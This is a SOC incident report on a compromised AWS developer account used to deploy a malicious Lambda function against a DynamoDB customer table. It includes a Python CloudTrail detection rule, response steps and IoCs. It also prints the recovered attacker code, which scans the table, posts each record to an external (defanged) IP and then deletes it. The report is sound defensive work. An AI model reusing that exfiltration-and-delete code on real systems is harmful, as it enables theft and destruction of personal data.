AWS GuardDuty Alert Details
Alert ID: GUARDDUTY-SERVERLESS-1648-7842
Alert Time: 2024-03-14 14:15:33 EST
Severity: HIGH (85/100)
Source: AWS GuardDuty + CloudTrail
Rule: "Unauthorized Lambda Function Creation and Invocation"
MITRE ATT&CK: T1648 – Serverless Execution
Alert Details:
Detection: Unauthorized creation and invocation of AWS Lambda function
AWS Account: 123456789012 (Development)
IAM User: dev_user (compromised developer account)
Source IP: 185.143.221[.]89 (Bulgaria)
Time: 14:00-14:15 EST
API Calls (CloudTrail):
14:00:15 – iam:CreateRole – created role “lambda-exec-role”
14:01:22 – iam:AttachRolePolicy – attached Lambda execution policy
14:02:45 – lambda:CreateFunction – created function “internal-backup-processor”
14:03:30 – lambda:UpdateFunctionCode – uploaded code (ZIP) from S3 (malicious)
14:04:15 – lambda:CreateEventSourceMapping – mapped to the DynamoDB stream of table "customer-data" (table changes now trigger the function)
14:05:22 – lambda:InvokeFunction – invoked function (test)
14:06:00-14:15:00 – 847 invocations of the function (scanning, exfiltrating and deleting records)
Function Code Analysis (from the deployment package and the function's CloudWatch logs):
Function reads from DynamoDB table “customer-data”
Exfiltrates data to external IP 185.143.221[.]89:443
Deletes records after exfiltration
Detection Logic:
Developer account dev_user does not normally create Lambda functions
Source IP anomalous (Bulgaria)
Function accesses sensitive DynamoDB table
Outbound connections to 185.143.221[.]89:443 observed in network telemetry (VPC Flow Logs; a Lambda function only appears there when attached to a VPC, otherwise GuardDuty's Lambda network activity monitoring is the source)
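The detection logic above, expressed as a rule over CloudTrail records. This is an added example for this report, not GuardDuty's rule implementation: it groups records by principal and scores the role -> policy -> function -> event source mapping build-out, the "first-time deployer", the anomalous source country, the mapping onto a sensitive table's stream, and the invocation burst. The GeoIP table, the known-deployer baseline, the sensitive-table list and all sample records are constructed here; the record shapes follow CloudTrail (note that Lambda control-plane events carry API-version suffixes such as CreateFunction20150331, and data-plane invocations appear as "Invoke").

```python
"""Score CloudTrail records for the T1648 build-out pattern (added example)."""
import re
from collections import defaultdict
from datetime import datetime, timedelta

GEOIP = {"185.143.221.89": "BG", "203.0.113.10": "US"}  # constructed stand-in for a GeoIP lookup
ALLOWED_COUNTRIES = {"US"}
KNOWN_DEPLOYERS = {"ci-deploy"}          # principals expected to create functions (CI/CD), assumed
SENSITIVE_TABLES = {"customer-data"}
BUILD_OUT = ["CreateRole", "AttachRolePolicy", "CreateFunction", "CreateEventSourceMapping"]
INVOCATION_BURST = 100                   # invocations of one function inside the window

def normalize(event_name):
    """Strip Lambda's API-version suffix (CreateFunction20150331, UpdateFunctionCode20150331v2)."""
    return re.sub(r"\d{8}(v\d+)?$", "", event_name)

def parse(record):
    """Pull the fields the rule needs out of one CloudTrail record (a dict)."""
    return {
        "time": datetime.strptime(record["eventTime"], "%Y-%m-%dT%H:%M:%SZ"),
        "user": record["userIdentity"].get("userName", "?"),
        "ip": record["sourceIPAddress"],
        "event": normalize(record["eventName"]),
        "params": record.get("requestParameters") or {},
    }

def score_principal(events, window=timedelta(minutes=15)):
    """events: one principal's parsed records sorted by time. Returns (score, reasons)."""
    reasons = []
    names = [e["event"] for e in events]
    # 1. The whole role -> policy -> function -> mapping sequence, in order, inside the window.
    if all(s in names for s in BUILD_OUT):
        idx = [names.index(s) for s in BUILD_OUT]
        span = events[max(idx)]["time"] - events[min(idx)]["time"]
        if idx == sorted(idx) and span <= window:
            reasons.append(f"full build-out sequence in {span}")
    # 2. Function creation by a principal that does not normally deploy functions.
    for u in {e["user"] for e in events if e["event"] == "CreateFunction"} - KNOWN_DEPLOYERS:
        reasons.append(f"{u} is not a known Lambda deployer")
    # 3. Any source IP outside the allowed countries.
    bad = {f"{e['ip']} ({GEOIP.get(e['ip'], '??')})" for e in events
           if GEOIP.get(e["ip"]) not in ALLOWED_COUNTRIES}
    if bad:
        reasons.append("anomalous source " + ", ".join(sorted(bad)))
    # 4. An event source mapping onto the stream of a sensitive table.
    for e in events:
        if e["event"] == "CreateEventSourceMapping":
            m = re.search(r":table/([^/]+)/stream/", e["params"].get("eventSourceArn", ""))
            if m and m.group(1) in SENSITIVE_TABLES:
                reasons.append(f"stream of sensitive table {m.group(1)} mapped to "
                               f"{e['params'].get('functionName')}")
    # 5. Invocation burst (Lambda data events are logged as "Invoke").
    per_fn = defaultdict(int)
    for e in events:
        if e["event"] in ("Invoke", "InvokeFunction"):
            per_fn[e["params"].get("functionName", "?")] += 1
    for fn, n in per_fn.items():
        if n >= INVOCATION_BURST:
            reasons.append(f"{n} invocations of {fn}")
    return len(reasons), reasons

def evaluate(records):
    """Group raw records by principal; return {user: (score, reasons)}."""
    by_user = defaultdict(list)
    for r in records:
        e = parse(r)
        by_user[e["user"]].append(e)
    return {u: score_principal(sorted(evs, key=lambda e: e["time"])) for u, evs in by_user.items()}

# --- constructed sample records mirroring the CloudTrail list in the alert ---
def _rec(t, user, ip, name, **params):
    return {"eventTime": f"2024-03-14T{t}Z", "userIdentity": {"type": "IAMUser", "userName": user},
            "sourceIPAddress": ip, "eventName": name, "requestParameters": params}

ATTACKER = "185.143.221.89"
STREAM = "arn:aws:dynamodb:us-east-1:123456789012:table/customer-data/stream/2024-03-14T14:04:00.000"
SAMPLE = [
    _rec("14:00:15", "dev_user", ATTACKER, "CreateRole", roleName="lambda-exec-role"),
    _rec("14:01:22", "dev_user", ATTACKER, "AttachRolePolicy", roleName="lambda-exec-role"),
    _rec("14:02:45", "dev_user", ATTACKER, "CreateFunction20150331", functionName="internal-backup-processor"),
    _rec("14:03:30", "dev_user", ATTACKER, "UpdateFunctionCode20150331v2", functionName="internal-backup-processor"),
    _rec("14:04:15", "dev_user", ATTACKER, "CreateEventSourceMapping20150331",
         functionName="internal-backup-processor", eventSourceArn=STREAM),
] + [
    _rec(f"14:{6 + i // 94:02d}:{i % 60:02d}", "dev_user", ATTACKER, "Invoke",
         functionName="internal-backup-processor") for i in range(847)
] + [
    # benign CI/CD deploy from an allowed country: no role work, no mapping, no burst
    _rec("14:10:00", "ci-deploy", "203.0.113.10", "CreateFunction20150331", functionName="orders-api"),
    _rec("14:10:05", "ci-deploy", "203.0.113.10", "UpdateFunctionCode20150331v2", functionName="orders-api"),
]

if __name__ == "__main__":
    for user, (score, reasons) in evaluate(SAMPLE).items():
        print(user, score, reasons)
```

The score is a simple count of triggered conditions; in production the sequence and sensitive-table conditions deserve more weight than geolocation alone, and the baseline of known deployers should be learned from CloudTrail history rather than hard-coded.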
SOC Investigation Process
Step | Action | Tools Used | Findings
1. Alert Validation | Verify GuardDuty alert against CloudTrail | GuardDuty Console, CloudTrail | Confirmed unauthorized Lambda creation and invocation
2. Function Analysis | Examine Lambda code; download the deployment package (lambda:GetFunction) and record the event source mappings before anything is deleted | AWS Lambda Console | Function exfiltrates DynamoDB data
3. Immediate Action | Stop execution (reserved concurrency 0, delete the event source mapping), then delete Lambda function | AWS Lambda | Function deleted
4. Role Cleanup | Detach policies and delete IAM role | AWS IAM | Role "lambda-exec-role" deleted
5. Account Remediation | Deactivate access keys and disable dev_user account | AWS IAM | Keys rotated; user disabled
6. Data Assessment | Determine exfiltrated data | DynamoDB Streams, CloudTrail data events, CloudWatch Logs | 8,000 customer records exfiltrated
Jira Incident Report
Ticket: SOC-2024-217
Summary: T1648 – Serverless Execution: Malicious Lambda Exfiltrates Customer Data
Status: RESOLVED
Resolution: MALICIOUS – Data Breach Confirmed
Priority: P1 – CRITICAL
Labels: T1648, serverless-execution, lambda, guardduty, data-breach
Components: Cloud-Security, Serverless-Security
INCIDENT ANALYSIS REPORT
1. Initial Context:
Detection Source: AWS GuardDuty + CloudTrail.
Alert: “Unauthorized Lambda Function Creation and Invocation”.
IAM User: dev_user (compromised developer account).
Function: internal-backup-processor (malicious).
Data: 8,000 customer records exfiltrated.
Time: 2024-03-14 14:15 EST.
Technique: MITRE ATT&CK T1648 – Serverless Execution.
2. Technical Analysis:
Attack Chain:
13:30 – dev_user credentials compromised (phishing)
13:45 – Attacker logs into AWS from Bulgaria
14:00-14:05 – Creates IAM role and Lambda function
14:05-14:15 – Invokes function 847 times, exfiltrating data
14:15 – GuardDuty detects
Lambda Function Analysis:
Name: internal-backup-processor
Runtime: Python 3.9
Code (recovered from the deployment package; IP defanged):
import boto3
import requests  # not in the Lambda runtime; the attacker bundled it in the uploaded ZIP

def handler(event, context):
    # The DynamoDB stream event is ignored; every invocation rescans the table
    dynamo = boto3.client('dynamodb')
    data = dynamo.scan(TableName='customer-data')  # one page (up to 1 MB) per invocation
    for item in data['Items']:
        # Each record is posted to the attacker's host, then removed from the table
        requests.post('https://185.143.221[.]89/exfil', json=item)
        dynamo.delete_item(TableName='customer-data', Key={'id': item['id']})
Purpose: Exfiltrate and delete customer records
Data Exfiltrated:
8,000 customer records (name, address, email, phone, SSN)
Total size: ~40 MB
Impact:
Customer data stolen
DynamoDB table partially deleted
3. Investigation Findings:
Timeline:
13:30 – Account compromised
13:45 – Attacker logs in
14:00-14:15 – Function creation and invocation
14:15 – Alert
14:17 – SOC investigates
14:18 – Function deleted
14:19 – Role deleted
14:20 – Account disabled
Indicators of Compromise (IoCs):
AWS:
– Lambda function: internal-backup-processor
– IAM role: lambda-exec-role
– Exfiltration IP: 185.143.221[.]89
Data:
– 8,000 customer records exfiltrated
4. Containment Actions:
Immediate Actions:
Deleted malicious Lambda function.
Deleted IAM role.
Rotated dev_user keys.
Disabled compromised account.
Blocked exfiltration IP.
Data Protection:
Determined scope of data loss (8,000 records).
Notified legal, PR, management.
Began customer notification process.
Restored deleted records with DynamoDB point-in-time recovery (PITR restores to a new table from a timestamp before 14:05; it cannot restore in place).
Cloud Remediation:
Implemented AWS Config rules and EventBridge rules on CloudTrail to alert on Lambda function and event source mapping creation.
Enabled VPC Flow Logs for VPC-attached Lambda functions and GuardDuty Lambda network activity monitoring.
Removed iam:CreateRole, iam:PassRole and lambda:CreateEventSourceMapping from developer IAM policies.
5. Root Cause Analysis:
Primary Cause: Developer account compromised.
Contributing Factors:
No MFA on account.
Excessive permissions: dev_user held iam:CreateRole, iam:AttachRolePolicy, iam:PassRole and Lambda create/update/invoke rights that its duties did not require.
No monitoring for new Lambda functions.
6. Business Impact:
Operational Impact: Minimal; records deleted by the function were restored from point-in-time recovery.
Data Exposure: 8,000 customer records stolen.
Regulatory Impact: GDPR/CCPA breach.
Reputational Impact: Significant.
7. Remediation & Prevention:
Completed Actions:
Function deleted.
Account secured.
Breach response initiated.
Technical Controls Enhanced:
Enforced MFA for all users.
Implemented least privilege IAM policies.
Extended GuardDuty coverage to Lambda network activity and wired findings to automated containment via EventBridge.
Deployed AWS Config rules for Lambda changes.
8. Conclusion:
An attacker compromised a developer account and created a malicious Lambda function that exfiltrated 8,000 customer records from DynamoDB. GuardDuty detected the anomalous activity, enabling deletion of the function. A full data breach response was initiated.
Closure Rationale: Data exfiltrated; function deleted; breach response initiated.
Analyst: [Your Name], SOC Analyst
Date: 2024-03-14 15:30 EST